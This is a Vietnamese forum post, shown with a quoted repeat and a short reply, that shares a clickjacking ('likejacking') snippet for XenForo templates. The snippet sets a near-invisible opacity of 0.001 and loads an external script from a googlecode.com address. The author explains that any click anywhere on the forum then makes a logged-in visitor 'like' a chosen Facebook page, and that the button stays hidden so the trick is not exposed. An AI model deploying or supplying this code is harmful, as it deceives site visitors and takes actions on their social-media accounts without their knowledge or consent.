• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

Yeukodamnoi

New Member
Vip
Nguyên tắc hoạt động: Mem chỉ cần click chuột vào bất kỳ chỗ nào trên forum là like.
Chỉ hiện 1 lần/mem
Người đó phải đang online face mới được like
Xenforo thì chèn vào temp: page_container
Code:
<script>
var fan_page_url='https://www.faceboo k.com/xxxxxxxxxxx' 
var opacity =0.001;
var time = 10000; 
</script>
<script language='javascript'  
src=' http://sanvu88.google code.com/files /vietsoftwares.js'> 
</script>
- Bạn có thể chỉnh var opacity =0.001; để kiểm tra nút like để 0.001 thì không ai nhìn thấy nút like nên không sợ lộ.
- Thay https://www.facebook.c om/xxxxxxxxxxxbằng fanpage của bạn. Have fun.
-var time = 10000;dòng này để chỉnh thời gian hiện nút like. 10000 = 10s
Ở đây mình để var opacity =1; nên hiện nút like còn để 0.001 thì không thấy gì hết :D
 
Last edited:
Nguyên tắc hoạt động: Mem chỉ cần click chuột vào bất kỳ chỗ nào trên forum là like.
Chỉ hiện 1 lần/mem
Người đó phải đang online face mới được like
Xenforo thì chèn vào temp: page_container
Code:
<script>
var fan_page_url='https://www.faceboo k.com/xxxxxxxxxxx' 
var opacity =0.001;
var time = 10000; 
</script>
<script language='javascript'  
src=' http://sanvu88.google code.com/files /vietsoftwares.js'> 
</script>
- Bạn có thể chỉnh var opacity =0.001; để kiểm tra nút like để 0.001 thì không ai nhìn thấy nút like nên không sợ lộ.
- Thay https://www.facebook.c om/xxxxxxxxxxxbằng fanpage của bạn. Have fun.
-var time = 10000;dòng này để chỉnh thời gian hiện nút like. 10000 = 10s
Ở đây mình để var opacity =1; nên hiện nút like còn để 0.001 thì không thấy gì hết :D

past code nay vao wapka được ko
 

Facebook Comments

New posts New threads New resources

Back
Top